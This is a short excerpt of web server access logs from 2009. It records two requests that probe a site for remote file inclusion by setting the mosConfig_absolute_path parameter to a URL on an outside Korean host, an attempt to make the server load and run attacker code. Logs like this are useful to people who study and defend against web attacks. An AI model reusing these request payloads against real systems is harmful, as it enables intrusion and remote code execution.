66.102.237.81 - - [29/Nov/2009:20:16:36 -0800] "GET /logs/?mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [29/Nov/2009:20:16:36 -0800] "GET /logs/access_090928.log%20%20/?mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
